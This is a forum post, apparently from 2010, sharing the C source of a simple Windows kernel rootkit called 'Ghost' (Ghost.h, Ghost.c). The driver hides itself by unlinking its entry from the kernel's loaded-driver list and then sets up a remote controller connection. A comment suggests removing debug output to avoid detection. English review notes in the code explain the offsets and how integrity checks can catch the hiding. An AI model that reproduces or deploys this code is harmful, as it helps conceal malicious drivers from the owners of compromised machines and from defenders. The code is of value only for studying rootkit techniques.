
简单的Rootkit


    发表于 2010-9-23 19:34:52 | 显示全部楼层 |阅读模式
    本帖最后由 whypro 于 2010-9-23 19:38 编辑

    就是从 LIST_ENTRY 链表上删除了节点，源码:
    Ghost.h
    // Copyright Ric Vieler, 2006
    // Support header for Ghost.c

    #ifndef _GHOST_H_
    #define _GHOST_H_

    // Win32-style aliases used by the rest of the module.
    // NOTE(review): this header relies on ntddk.h having been included first
    // (BOOLEAN, LIST_ENTRY and UNICODE_STRING are not defined here), and the
    // DDK headers already define ULONG, so the ULONG typedef below repeats an
    // existing definition (harmless only if the two agree).
    typedef BOOLEAN BOOL;
    // DWORD is a 32-bit quantity; Ghost.c casts pointers through it, so these
    // aliases implicitly assume a 32-bit target.
    typedef unsigned long DWORD;
    typedef DWORD* PDWORD;
    typedef unsigned long ULONG;
    typedef unsigned short WORD;
    typedef unsigned char BYTE;

    // Partial mirror of the per-driver loader record that DriverEntry
    // (Ghost.c) reaches through the DRIVER_OBJECT. Only listEntry is touched
    // by this module; the unknownN fields appear to be opaque padding so that
    // path and name land at the offsets the author expected.
    // NOTE(review): the layout is version-specific and assumes a 32-bit build
    // (DWORD == 4 bytes). It is not validated against the running kernel at
    // load time, so a mismatch corrupts whatever actually lives there.
    typedef struct _DRIVER_DATA
    {
    LIST_ENTRY listEntry;   // links this record into the kernel's driver list
    DWORD  unknown1;        // unknown1..unknown7: not interpreted here, offset padding
    DWORD  unknown2;
    DWORD  unknown3;
    DWORD  unknown4;
    DWORD  unknown5;
    DWORD  unknown6;
    DWORD  unknown7;
    UNICODE_STRING path;    // presumably the image path (per the field name; unused here)
    UNICODE_STRING name;    // presumably the image name (per the field name; unused here)
    } DRIVER_DATA;

    #endif

    Ghost.c
    // Ghost
    // Copyright Ric Vieler, 2006

    #include "ntddk.h"
    #include "Ghost.h"
    #include "fileManager.h"
    #include "configManager.h"

    // Global version data
    // Filled once by PsGetVersion() in DriverEntry and read only there, for
    // the trace output. Non-static, so both symbols have external linkage.
    ULONG majorVersion;
    ULONG minorVersion;

    // Comment out in free build to avoid detection
    // Unload routine registered from DriverEntry via pDriverObject->DriverUnload.
    // Only emits a debug trace: pDriverObject is not used, and nothing that
    // Configure() may have set up is torn down here (configManager.h is not part
    // of this listing, so whether cleanup is required cannot be confirmed).
    VOID OnUnload( IN PDRIVER_OBJECT pDriverObject )
    {
    DbgPrint("comint32: OnUnload called.");
    }


    // Driver entry point: records the OS version, removes this driver's loader
    // record from the kernel's driver list, registers the unload routine, then
    // hands off to Configure() (configManager.h, not shown in this listing).
    //
    // NOTE(review): the list manipulation below uses a hard-coded offset and
    // casts pointers through a 32-bit DWORD, so it is only meaningful on a
    // 32-bit build (a 64-bit pointer would be truncated), and it modifies a
    // shared kernel list with no synchronization. The DRIVER_OBJECT itself and
    // the pointer it holds at offset 20 are left intact, which is the
    // inconsistency that cross-view integrity checks can compare against.
    NTSTATUS DriverEntry( IN PDRIVER_OBJECT pDriverObject, IN PUNICODE_STRING
    theRegistryPath )
    {
    DRIVER_DATA* driverData;

    // Get the operating system version
    // Fills the file-scope majorVersion/minorVersion globals; build number and
    // service-pack string are not requested (NULL).
    PsGetVersion( &majorVersion, &minorVersion, NULL, NULL );

    // Major = 4: Windows NT 4.0, Windows Me, Windows 98 or Windows 95
    // Major = 5: Windows Server 2003, Windows XP or Windows 2000
    // Minor = 0: Windows 2000, Windows NT 4.0 or Windows 95
    // Minor = 1: Windows XP
    // Minor = 2: Windows Server 2003

    // The version only selects a trace message; nothing later in this
    // function branches on it (the fixed offset below is used regardless).
    if ( majorVersion == 5 && minorVersion == 2 )
    {

      DbgPrint("comint32: Running on Windows 2003");
    }
    else if ( majorVersion == 5 && minorVersion == 1 )
    {

      DbgPrint("comint32: Running on Windows XP");
    }
    else if ( majorVersion == 5 && minorVersion == 0 )
    {
      DbgPrint("comint32: Running on Windows 2000");
    }
    else if ( majorVersion == 4 && minorVersion == 0 )
    {

      DbgPrint("comint32: Running on Windows NT 4.0");
    }
    else
    {

      DbgPrint("comint32: Running on unknown system");
    }

    // Hide this driver
    // Reads a DRIVER_DATA* stored 20 bytes into the DRIVER_OBJECT — presumably
    // the DriverSection field of a 32-bit DRIVER_OBJECT; confirm against the
    // target build, the offset is not derived from a structure definition.
    driverData = *((DRIVER_DATA**)((DWORD)pDriverObject + 20));
    if( driverData != NULL )
    {
      // unlink this driver entry from the driver list
      // Blink is treated as a pointer to the predecessor's Flink (Flink is the
      // first member of LIST_ENTRY), so this stores our Flink into
      // predecessor->Flink via a raw 32-bit write. Neither Flink nor Blink is
      // checked for NULL first.
      *((PDWORD)driverData->listEntry.Blink) = (DWORD)driverData->listEntry.Flink;
      // successor->Blink = our Blink. Our own entry's Flink/Blink are not
      // reset, so the record still points into the list it was removed from.
      driverData->listEntry.Flink->Blink = driverData->listEntry.Blink;
    }

    // Allow the driver to be unloaded

    // Registers OnUnload (above) as the unload routine.
    pDriverObject->DriverUnload = OnUnload;

    // Configure the controller connection
    // Configure() is declared in configManager.h (not visible here).
    // NOTE(review): this failure path runs after the list entry has already
    // been unlinked, so a failed load still leaves the kernel list modified.
    if( !NT_SUCCESS( Configure() ) )
    {
      DbgPrint("comint32: Could not configure remote connection.\n");
      return STATUS_UNSUCCESSFUL;
    }

    return STATUS_SUCCESS;
    }

    此图为证
    Snap2.gif